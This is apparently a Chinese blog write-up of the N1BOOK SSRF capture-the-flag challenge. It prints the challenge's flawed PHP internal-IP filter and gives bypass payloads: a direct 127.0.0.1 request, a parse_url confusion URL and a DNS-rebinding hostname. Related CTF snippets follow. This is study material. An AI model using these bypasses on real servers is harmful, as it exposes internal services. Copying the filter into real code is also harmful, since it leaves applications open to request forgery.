N1BOOK SSRF

最新推荐文章于 2024-02-09 18:31:34 发布
最新推荐文章于 2024-02-09 18:31:34 发布
阅读量401 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/111767878
版权

在这里插入图片描述
可以用dict和file协议进行读取,但是读不到完整的flag,说明flag.php做了ip限制
访问本地ip即可读取

url=http://127.0.0.1/flag.php

利用url解析绕过

<?php 
highlight_file(__FILE__);
function check_inner_ip($url) 
{ 
    $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); 
    if (!$match_result) 
    { 
        die('url fomat error'); 
    } 
    try 
    { 
        $url_parse=parse_url($url); 
    } 
    catch(Exception $e) 
    { 
        die('url fomat error'); 
        return false; 
    } 
    $hostname=$url_parse['host']; 
    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip); 
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; 
} 

function safe_request_url($url) 
{ 
     
    if (check_inner_ip($url)) 
    { 
        echo $url.' is inner ip'; 
    } 
    else 
    {
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        $output = curl_exec($ch); 
        $result_info = curl_getinfo($ch); 
        if ($result_info['redirect_url']) 
        { 
            safe_request_url($result_info['redirect_url']); 
        } 
        curl_close($ch); 
        var_dump($output); 
    } 
     
} 

$url = $_GET['url']; 
if(!empty($url)){ 
    safe_request_url($url); 
} 

?>

这里限制了ip地址和协议
这是利用url解析漏洞
讲解

?url=http://a@127.0.0.1:80@baidu.com/flag.php

DNS重绑定
重绑定网站

这个可以让一个域名绑定两个ip

http://7f000001.c0a80001.rbndr.us/flag.php

在这里插入图片描述
同样可以进行绕过
书上也说了可以自己搭一个dns_server,这个东东以后有时间看看

penson by 小乌
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
SSRF bible. Cheatsheet
08-06
标题 "SSRF bible. Cheatsheet" 和描述 "SSRF bible. Cheatsheet SSRF attack and sockets presentation." 显示了文档的主题为服务器端请求伪造(SSRF)攻击和相关技术的介绍与实践。SSRF是一种网络攻击技术,攻击者...
CTF刷题记录Buuctf-N1BOOK-SSRF
m_de_g的博客
06-23 1496
** N1BOOK-SQL2 ** 一、解题思路 1.查看页面源代码,发现了challenge.php 2.在进行ssrf攻击之前,先进行一波代码审计 3.根据题目要求,访问本机的flag.php,本道题是用了白名单的方式,通过parse_url()后分解出来的IP不能为白名单内的IP,所以我们主要需要绕过parse_url(),在线php调试 4.构造的payload为:http://fghkk@127.0.0.1:80@baidu.com/flag.php 5.当我使用get传参的方式时,
CTFHub-SSRF
a21536545645的博客
07-07 320
原理: 有可控参数,并且这个可控参数可以用来访问其他网络,服务。那么就可以用这个参数,以目标主机为跳板,访问内网的资源或者访问外网。 一,内网访问 审题很重要 只有一个链接 根据提示访问127.0.0.1/flag.php就可以得到flag,但是用localhost就不行,应该是后台做了限制 后台的代码应该类似这样: <?php highlight_file(__FILE__); $url=$_GET['url']; $curl=curl_init($url); $res
N1BOOK详解
shinygod的博客
10-06 1406
然后上传,访问/zzz.php.zzz就可以了,这样就解析成php了,因为apache是从右到左解析的,遇到不认识的后缀就忽略,继续往前解析,但这个漏洞有版本限制。用户名为admin时,显示账号或密码错误,但用户名不是admin时,显示账号不存在,所以用户名是admin。但是第三步一直成功不了,就尝试用nc直接下载也没成功,不清楚是怎么回事,望大佬告之!两种方式,一种布尔盲注,一种报错注入,也有可能有第三种,user.php没用到。,然后压缩,再用010打开,选择并双击一个start不为0h的。
N1BOOK[第一章 web入门]信息搜集
cfy2401926342的博客
02-07 215
挨个观察,三部分flag。文件泄露,蚁剑扫描路径。
N1Book-第一章Web入门-举足轻重的信息搜集-粗心的小李
抒情诗
05-08 256
本题为Nu1L团队编著的《从0到1:CTFer成长之路》配套题目。来源网站:https://book.nu1l.com/dump下来的index.html源码里面包含了flag。也是比较老的考点了,访问。使用工具dump源码。
WebLogic SSRF 及漏洞修复
11-25
### WebLogic SSRF 及其漏洞修复方法 #### 一、背景介绍 WebLogic SSRF(Server Side Request Forgery)是一种网络安全漏洞,攻击者可以通过控制Web应用去发起针对内网或者外网的服务请求,实现对目标系统的攻击。...
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
第一节 SSRF原理介绍-01
09-15
SSRF漏洞原理介绍 SSRF(Server-Side Request Forgery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。客户端服务端内网资源一般情况下,SSRF的目标就是与外部隔离的内网资源。 SSRF漏洞定义: ...
从0到1的CTF之旅———— N1BOOK(1)
qq_44373268的博客
06-10 853
在信息收集方面可以说是一窍不通,只有跟着大佬们边学边做了,无师自通的打工人 ————————————————————————————————————————————第一题:常见的搜集(题目如下) 打开御剑工具直接扫描,可以扫到一个子目录 很奇怪,这个index.php就是当前页面,相当于白扫了。。。。想了半天也没想明白为啥。。。再扫一遍试一下,如果还扫不出来就换个思路来做。ten minutes later。。。。说实话,扫这玩意真的浪费时间,而且对电脑的要求也比较高,每次跑着跑着CPU就90多度了,页面
【BUUCTF N1BOOK】[第九章 CTF之MISC章] 通关
人若无名,便可专心练剑
02-06 742
N1BOOK是Nu1L Team为方便读者打造的免费平台,读者可在上面享受书籍相关资源以及查阅勘误。
N1Book-第一章Web入门-任意文件读取漏洞-afr_1
抒情诗
05-08 358
这个是传统的任意文件读取漏洞,可以利用php的本地文件包含(Local File Include)实现,使用php的伪协议进行文件读取;或者利用php文件读取函数。本题为Nu1L团队编著的《从0到1:CTFer成长之路》配套题目。来源网站:https://book.nu1l.com/这里可能没有include文件包含,而是使用。没源码不好分析,这里应该逻辑也不大难。造成的文件读取漏洞。
【BUUCTF N1BOOK】[第三章 web进阶] 通关
最新发布
人若无名,便可专心练剑
02-09 1262
N1BOOK是Nu1L Team为方便读者打造的免费平台,读者可在上面享受书籍相关资源以及查阅勘误。
如何用docker搭建N1BOOK题目的环境
aoao331198的博客
04-05 1946
文章目录前言配置一台CentOS7安装docker和docker-compose编辑docker-compose.yml 前言 在做BUU的N1Book题目的时候,遇到一些题目wp是自己搭建靶机,这样能更好的看到靶机实际的变化,能有更深的理解,于是自己索性也想这样尝试,一干就是小半个晚上<_>!! 配置一台CentOS7 教程 照这个教程基本上没有问题 安装docker和docker-compose 同样的用现有教程 教程 踩了个雷,可能遇到这样问题 解决方法 根据提示在命令结尾加上–allo
Nu1lbook配套题目web入门-常见的搜索
m0_65364832的博客
07-18 116
Nu1lbook配套Web题目-常见的搜索。Dirsearch允许用户使用自定义字典来进行扫描。字典文件包含了要扫描的目录和文件的列表。用户可以根据自己的需求创建自定义字典,以便更好地针对目标进行扫描。
N1Book-第一章Web入门-任意文件读取漏洞-afr_2
抒情诗
05-08 730
由于Nginx配置不当产生了目录穿越漏洞。本题使用的是OpenResty,而OpenResty是基于Nginx与Lua实现的,所以Nginx存在的漏洞,OpenResty同样也可能存在。而且这不是代码里面的漏洞,配置漏洞的话大概率是被放在危险性比较低的位置上的。
从0到1CTFer成长之路-第二章-SSRF漏洞
黑白的博客
03-01 744
SSRF漏洞 声明 好好向大佬们学习!!! 攻击 SSRF Training 摘自 https://book.nu1l.com/tasks/#/ 使用BUUCTF在线环境 https://buuoj.cn/challenges 访问 http://72b1f71b-d44d-4562-8bac-db517053ebc4.node3.buuoj.cn 还挺像素的,点了一圈都没用,也就intersting challenge能点,点击出现源码,其实大概一看,这里应该就是通过网页提交url获取flag的.
[网鼎杯 2018]Fakebookssrf漏洞)
qq_44657899的博客
03-16 4657
因为是看了wp才做出来的,所以就直接记录过程和知识点了。 知识点:SSRF SSRF,也就是Server Side RequestForgery—服务器端请求伪造。从字面上来看,与CSRF不同的是,它是服务器端发出的请求伪造而非从用户一端提交。别误会,作为受信任用户,服务器当然不可能做出损害用户信息的事。它是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞。因为它是由服务端发起的,所以它能够请...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值